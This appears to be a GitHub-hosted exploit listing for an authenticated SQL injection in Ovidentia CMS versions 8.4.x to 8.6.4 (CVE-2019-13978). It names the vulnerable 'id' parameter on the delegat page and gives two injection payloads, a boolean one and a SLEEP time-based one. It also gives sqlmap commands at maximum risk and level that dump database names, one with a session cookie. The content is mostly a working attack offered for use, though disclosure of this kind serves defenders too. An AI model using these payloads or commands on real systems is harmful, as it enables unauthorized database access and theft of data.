Skip to content
Permalink
Branch: master
Find file Copy path
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
38 lines (29 sloc) 1.34 KB
#-------------------------------------------------------
# Exploit Title: Ovidentia CMS - SQL Injection (Authenticated)
# Date: 06/05/2019
# [ CVE-2019-13978 ]
# Exploit Author:
# Fernando Pinheiro (n3k00n3)
# Victor Flores (UserX)
# Vendor Homepage: https://www.ovidentia.org/
# Version: 8.4.x < 8.6.4
# Tested on: Mac,linux - Firefox, safari
# Download http://en.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FDistributions&file=ovidentia-8-4-3.zip&idf=893
#
# [ Kitsun3Sec Research Group ]
#--------------------------------------------------------
POC
Path: /ovidentia/index.php?tg=delegat&idx=mem&id=1
Type: GET
Vulnerable Field: id
Payload:
1. tg=delegat&idx=mem&id=1 AND 3152=(SELECT (CASE WHEN (3152=3152) THEN 3152 ELSE (SELECT 9962 UNION SELECT
2. tg=delegat&idx=mem&id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))QwTg)
URL: https://target/ovidentia/index.php?tg=delegat&idx=mem&id=1
Using Request file
sqlmap.py -r req --random-agent --risk 3 --level 5 --dbms=mysql -p id --dbs
Using Get
./sqlmap.py -u http://target/ovidentia/index.php\?tg\=delegat\&idx\=mem\&id\=1 --cookie "Cookie: OV1364928461=6kb5jvu7f6lg93qlo3vl9111f8" --random-agent --risk 3 --level 5 --dbms=mysql -p id --dbs
---
[CHANGELOG]
4th of August of 2019 - Ovidentia 8.6.4 tested and failed to prevent the attack, therefore still vulnerable.
You can’t perform that action at this time.